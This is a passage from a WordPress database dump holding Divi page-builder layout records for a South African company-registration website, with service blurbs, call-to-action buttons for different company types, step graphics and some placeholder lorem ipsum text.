custom_padding=\"40px|30px|40px|30px|true|true\" animation_style=\"roll\"]<p><span style=\"color: #000000;\">If we don\'t deliver within a reasonable time you may cancel at anytime.</span></p>\r\n<p><span style=\"color: #000000;\">NB: The CIPC and SARS may exceed their delivery times</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row]','guarantee and save','','publish','closed','closed','','guarantee-and-save','','','2018-12-10 09:17:23','2018-12-10 07:17:23','',0,'https://companyregistration.online/et_pb_layout/guarantee-and-save/',0,'et_pb_layout','',0),(29382,3,'2018-12-10 09:17:46','2018-12-10 07:17:46','[et_pb_row make_fullwidth=\"on\" custom_padding=\"0px|0px|38px|0px\" _builder_version=\"3.0.89\" template_type=\"row\"][et_pb_column type=\"1_3\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_blurb url=\"https://companyregistration.online/product-category/maintaning-our-company/\" use_icon=\"on\" font_icon=\"%%173%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"maintaining your company\" _builder_version=\"3.2.1\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"15px|10px||10px\" animation_style=\"slide\" animation_direction=\"left\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h3 style=\"text-align: center;\"><strong><a href=\"https://companyregistration.online/product-category/maintaning-our-company/\">Maintaining Your Company</a></strong></h3>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_blurb url=\"https://companyregistration.online/product-category/bee-requirements/\" use_icon=\"on\" font_icon=\"%%170%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"BEEE Requirements\" _builder_version=\"3.2.1\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"15px|10px||10px\" animation_style=\"flip\" animation_delay=\"600ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h3 style=\"text-align: center;\"><strong><a href=\"https://companyregistration.online/product-category/bee-requirements/\">Bee Requirements</a></strong></h3>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_blurb url=\"https://companyregistration.online/product-category/business-tools/\" use_icon=\"on\" font_icon=\"%%176%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Business Tools\" _builder_version=\"3.2.1\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"15px|10px||10px\" animation_style=\"slide\" animation_direction=\"right\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h3 style=\"text-align: center;\"><strong><a href=\"https://companyregistration.online/product-category/business-tools/\">Business Tools</a></strong></h3>\r[/et_pb_blurb][/et_pb_column][/et_pb_row]','3 blurb services','','publish','closed','closed','','3-blurb-services','','','2018-12-10 09:17:46','2018-12-10 07:17:46','',0,'https://companyregistration.online/et_pb_layout/3-blurb-services/',0,'et_pb_layout','',0),(29385,3,'2018-12-10 10:53:42','2018-12-10 08:53:42','[et_pb_section fb_built=\"1\" admin_label=\"Call to Action\" _builder_version=\"3.17.6\" background_color=\"rgba(255,255,255,0.66)\" background_image=\"https://companyregistration.online/wp-content/uploads/2018/12/flag-of-the-republic-of-south-africa_1401-226.jpg\" background_blend=\"screen\" box_shadow_style=\"preset2\" custom_padding=\"46px|0px|147px|0px|false|false\" background__hover_enabled=\"on\"][et_pb_row make_fullwidth=\"on\" custom_padding=\"0px|0px|0px|0px\" custom_margin=\"-10px||0px|\" background_position_1=\"top_left\" background_position_2=\"top_left\" background_repeat_1=\"no-repeat\" background_repeat_2=\"no-repeat\" admin_label=\"Flags\" _builder_version=\"3.17.6\" locked=\"off\"][et_pb_column type=\"1_2\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\" background_position=\"top_left\" background_repeat=\"no-repeat\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2017/07/Sa-Flag-optimised.png\" _builder_version=\"3.0.89\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2000ms\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\" background_position=\"top_left\" background_repeat=\"no-repeat\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2017/07/Sa-Flag-optimised.png\" align=\"right\" disabled_on=\"on|on|off\" _builder_version=\"3.2.1\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2500ms\" animation_delay=\"200ms\" animation_starting_opacity=\"8%\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row custom_padding=\"0px|0px|6px|0px|false|false\" custom_margin=\"0px||\" _builder_version=\"3.17.6\"][et_pb_column type=\"4_4\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_text _builder_version=\"3.3.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong>We Do Company Registrations of all types</strong></span><span style=\"font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\"><br /> </span></strong></span></h1>\n<p><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong></strong></span></p>\n<p><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong></strong></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row use_custom_gutter=\"on\" gutter_width=\"2\" custom_padding=\"27px|15px|27px|14px|false|false\" custom_margin=\"|||\" make_equal=\"on\" _builder_version=\"3.17.6\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" box_shadow_style=\"preset1\" box_shadow_horizontal=\"3px\" border_radii=\"on|15px|15px|15px|15px\"][et_pb_column type=\"1_4\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_cta title=\"Owner Managed\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.17.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px||5px\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong>Businesses with 1 shareholder directly involved in running the business</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/private-company-with-a-standard-moi-basic/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_size=\"16px\" button_border_width=\"0px\" button_font=\"|on|||\" background_layout=\"dark\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_cta title=\"Multiple Shareholders\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.16\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px||5px\" animation_style=\"flip\" animation_delay=\"600ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong>Businesses with  2 or more shareholders directly involved in running the business</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/private-company-with-a-standard-moi-full/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_size=\"16px\" button_border_width=\"0px\" button_font=\"|on|||\" background_layout=\"dark\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_cta title=\"Professional company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.16\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px||5px\" animation_style=\"flip\" animation_delay=\"800ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p class=\"\"><strong>Business Professionals  such as </strong><strong>Accountants, Lawyers and Doctors practising in a company</strong><span style=\"color: #ffffff;\"><strong>a</strong></span></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/personal-liability-company/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_size=\"16px\" button_border_width=\"0px\" button_font=\"|on|||\" background_layout=\"dark\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_cta title=\"Shareholder Role\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.16\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px||5px\" animation_style=\"flip\" animation_delay=\"1000ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong>Businesses with  shareholders who are not directly involved in running the business</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/private-company-customised-moi-full/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_size=\"16px\" button_border_width=\"0px\" button_font=\"|on|||\" background_layout=\"dark\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.17.6\" custom_padding=\"42px|0px|48px|0px|false|false\"][et_pb_column type=\"4_4\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][et_pb_text text_font_size=\"39px\" _builder_version=\"3.17.6\" text_font=\"||||||||\"]<p style=\"text-align: center;\">Avoid Tax Penalties By Registering the correct company.</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.17.6\" make_fullwidth=\"on\" box_shadow_style=\"preset1\" border_radii=\"on|15px|15px|15px|15px\"][et_pb_column type=\"1_5\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][et_pb_text _builder_version=\"3.17.6\" text_font_size=\"31px\" header_font_size=\"28px\" header_font=\"||||||||\" text_font=\"||||||||\" text_text_color=\"#000000\"]<p style=\"text-align: center;\">Step 1</p>\n[/et_pb_text][et_pb_blurb title=\"Find The Product You Need\" image=\"https://companyregistration.online/wp-content/uploads/2018/12/software-26.png\" _builder_version=\"3.17.6\" header_font=\"||||||||\" header_font_size=\"25px\" header_text_align=\"center\"]<br />\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2016/03/advance1600.png\" _builder_version=\"3.17.6\" max_width=\"80%\" custom_padding=\"63px||\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][et_pb_text _builder_version=\"3.17.6\" text_font_size=\"25px\" text_font=\"||||||||\" text_text_color=\"#000000\"]<p style=\"text-align: center;\">Step 2</p>\n[/et_pb_text][et_pb_blurb title=\"Purchase\" image=\"https://companyregistration.online/wp-content/uploads/2018/12/Bank_13.png\" _builder_version=\"3.17.6\" text_orientation=\"center\" header_font=\"||||||||\" header_font_size=\"25px\" header_text_align=\"center\" body_font=\"||||||||\" body_font_size=\"19px\"]<br />\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2016/03/advance1600.png\" _builder_version=\"3.17.6\" max_width=\"80%\" custom_padding=\"63px||\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][et_pb_text _builder_version=\"3.17.6\" text_font_size=\"25px\" text_font=\"||||||||\" text_text_color=\"#000000\"]<p style=\"text-align: center;\">Step 3</p>\n[/et_pb_text][et_pb_blurb image=\"https://companyregistration.online/wp-content/uploads/2018/12/software-25.png\" _builder_version=\"3.17.6\" body_font=\"||||||||\" body_font_size=\"22px\" header_font=\"||||||||\" header_font_size=\"25px\" title=\"Check your e-mails for instructions on how to complete the form\" header_text_align=\"center\"]<p style=\"text-align: center;\">step 3</p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.17.6\"][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Call to Action\" _builder_version=\"3.0.85\" box_shadow_style=\"preset2\" custom_padding=\"3px|0px|43px|0px|false|false\"][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Services \" _builder_version=\"3.17.2\"][et_pb_row use_custom_width=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" _builder_version=\"3.17.6\" gutter_width__hover=\"3\" gutter_width__hover_enabled=\"3\" parallax_1__hover=\"off\" parallax_1__hover_enabled=\"off\" parallax_2__hover=\"off\" parallax_2__hover_enabled=\"off\" parallax_3__hover=\"off\" parallax_3__hover_enabled=\"off\" parallax_4__hover=\"off\" parallax_4__hover_enabled=\"off\" parallax_5__hover=\"off\" parallax_5__hover_enabled=\"off\" parallax_6__hover=\"off\" parallax_6__hover_enabled=\"off\" parallax_method_1__hover=\"on\" parallax_method_1__hover_enabled=\"on\" parallax_method_2__hover=\"on\" parallax_method_2__hover_enabled=\"on\" parallax_method_3__hover=\"on\" parallax_method_3__hover_enabled=\"on\" parallax_method_4__hover=\"on\" parallax_method_4__hover_enabled=\"on\" parallax_method_5__hover=\"on\" parallax_method_5__hover_enabled=\"on\" parallax_method_6__hover=\"on\" parallax_method_6__hover_enabled=\"on\" use_background_color_gradient__hover=\"off\" use_background_color_gradient__hover_enabled=\"off\" background_color_gradient_start__hover=\"#2b87da\" background_color_gradient_start__hover_enabled=\"#2b87da\" background_color_gradient_end__hover=\"#29c4a9\" background_color_gradient_end__hover_enabled=\"#29c4a9\" background_color_gradient_type__hover=\"linear\" background_color_gradient_type__hover_enabled=\"linear\" background_color_gradient_direction__hover=\"180deg\" background_color_gradient_direction__hover_enabled=\"180deg\" background_color_gradient_direction_radial__hover=\"center\" background_color_gradient_direction_radial__hover_enabled=\"center\" background_color_gradient_start_position__hover=\"0%\" background_color_gradient_start_position__hover_enabled=\"0%\" background_color_gradient_end_position__hover=\"100%\" background_color_gradient_end_position__hover_enabled=\"100%\" background_color_gradient_overlays_image__hover=\"off\" background_color_gradient_overlays_image__hover_enabled=\"off\" parallax__hover=\"off\" parallax__hover_enabled=\"off\" parallax_method__hover=\"on\" parallax_method__hover_enabled=\"on\" background_size__hover=\"cover\" background_size__hover_enabled=\"cover\" background_position__hover=\"center\" background_position__hover_enabled=\"center\" background_repeat__hover=\"no-repeat\" background_repeat__hover_enabled=\"no-repeat\" background_blend__hover=\"normal\" background_blend__hover_enabled=\"normal\" allow_player_pause__hover=\"off\" allow_player_pause__hover_enabled=\"off\" background_video_pause_outside_viewport__hover=\"on\" background_video_pause_outside_viewport__hover_enabled=\"on\" make_fullwidth__hover=\"off\" make_fullwidth__hover_enabled=\"off\" use_custom_width__hover=\"off\" use_custom_width__hover_enabled=\"off\" width_unit__hover=\"on\" width_unit__hover_enabled=\"on\" custom_width_px__hover=\"1080px\" custom_width_px__hover_enabled=\"1080px\" custom_width_percent__hover=\"80%\" custom_width_percent__hover_enabled=\"80%\" use_custom_gutter__hover=\"off\" use_custom_gutter__hover_enabled=\"off\" make_equal__hover=\"off\" make_equal__hover_enabled=\"off\" border_radii__hover=\"on||||\" border_radii__hover_enabled=\"on||||\" box_shadow_style__hover=\"none\" box_shadow_style__hover_enabled=\"none\" box_shadow_color__hover=\"rgba(0,0,0,0.3)\" box_shadow_color__hover_enabled=\"rgba(0,0,0,0.3)\" filter_hue_rotate__hover=\"0deg\" filter_hue_rotate__hover_enabled=\"0deg\" filter_saturate__hover=\"100%\" filter_saturate__hover_enabled=\"100%\" filter_brightness__hover=\"100%\" filter_brightness__hover_enabled=\"100%\" filter_contrast__hover=\"100%\" filter_contrast__hover_enabled=\"100%\" filter_invert__hover=\"0%\" filter_invert__hover_enabled=\"0%\" filter_sepia__hover=\"0%\" filter_sepia__hover_enabled=\"0%\" filter_opacity__hover=\"100%\" filter_opacity__hover_enabled=\"100%\" filter_blur__hover=\"0px\" filter_blur__hover_enabled=\"0px\" mix_blend_mode__hover=\"normal\" mix_blend_mode__hover_enabled=\"normal\" animation_style__hover=\"none\" animation_style__hover_enabled=\"none\" animation_repeat__hover=\"once\" animation_repeat__hover_enabled=\"once\" animation_direction__hover=\"center\" animation_direction__hover_enabled=\"center\" animation_duration__hover=\"1000ms\" animation_duration__hover_enabled=\"1000ms\" animation_delay__hover=\"0ms\" animation_delay__hover_enabled=\"0ms\" animation_intensity_slide__hover=\"50%\" animation_intensity_slide__hover_enabled=\"50%\" animation_intensity_zoom__hover=\"50%\" animation_intensity_zoom__hover_enabled=\"50%\" animation_intensity_flip__hover=\"50%\" animation_intensity_flip__hover_enabled=\"50%\" animation_intensity_fold__hover=\"50%\" animation_intensity_fold__hover_enabled=\"50%\" animation_intensity_roll__hover=\"50%\" animation_intensity_roll__hover_enabled=\"50%\" animation_starting_opacity__hover=\"0%\" animation_starting_opacity__hover_enabled=\"0%\" animation_speed_curve__hover=\"ease-in-out\" animation_speed_curve__hover_enabled=\"ease-in-out\" hover_transition_duration__hover=\"300ms\" hover_transition_duration__hover_enabled=\"300ms\" hover_transition_delay__hover=\"0ms\" hover_transition_delay__hover_enabled=\"0ms\" hover_transition_speed_curve__hover=\"ease\" hover_transition_speed_curve__hover_enabled=\"ease\"][et_pb_column type=\"1_3\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2018/12/bank-icon-12-2.png\" url=\"#\" always_center_on_mobile=\"off\" _builder_version=\"3.17.6\" background_color=\"rgba(46,220,177,0.2)\" border_color_all=\"rgba(46,220,177,0.1)\" max_width=\"80px\" custom_margin=\"|||30px\" custom_padding=\"|||\" background__hover_enabled=\"on\" background_color__hover=\"#000000\"][/et_pb_image][et_pb_cta title=\"Online Banking\" button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.17.6\" header_level=\"h6\" header_font=\"Roboto|700|||||||\" header_font_size=\"16px\" header_line_height=\"1.4em\" body_line_height=\"2em\" background_color=\"#ffffff\" custom_button=\"on\" button_text_size=\"13px\" button_text_color=\"#2edcb1\" button_bg_color=\"rgba(255,255,255,0)\" button_border_width=\"0px\" button_border_color=\"rgba(0,0,0,0)\" button_border_radius=\"5px\" button_letter_spacing=\"1px\" button_font=\"Roboto|||on|||||\" button_icon=\"%%180%%\" button_on_hover=\"off\" box_shadow_style=\"preset1\" box_shadow_vertical=\"40px\" box_shadow_blur=\"40px\" box_shadow_color=\"rgba(0,0,0,0)\" text_orientation=\"left\" background_layout=\"light\" custom_padding=\"|30px|30px|30px|false|true\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" link_option_url=\"#\" button_letter_spacing_hover=\"1px\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"1px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" box_shadow_vertical__hover_enabled=\"on\" box_shadow_color__hover_enabled=\"on\" box_shadow_blur__hover_enabled=\"on\" box_shadow_vertical__hover=\"30px\" box_shadow_blur__hover=\"45px\" box_shadow_color__hover=\"rgba(131,146,167,0.2)\"]Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod.\r[/et_pb_cta][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2018/12/bank-icon-9-2.png\" url=\"#\" always_center_on_mobile=\"off\" _builder_version=\"3.17.6\" background_color=\"rgba(46,220,177,0.2)\" border_color_all=\"rgba(46,220,177,0.1)\" max_width=\"80px\" custom_margin=\"|||30px\" custom_padding=\"|||\" locked=\"off\" background__hover_enabled=\"on\" background_color__hover=\"#000000\"][/et_pb_image][et_pb_cta title=\"Home Loans\" button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.17.6\" 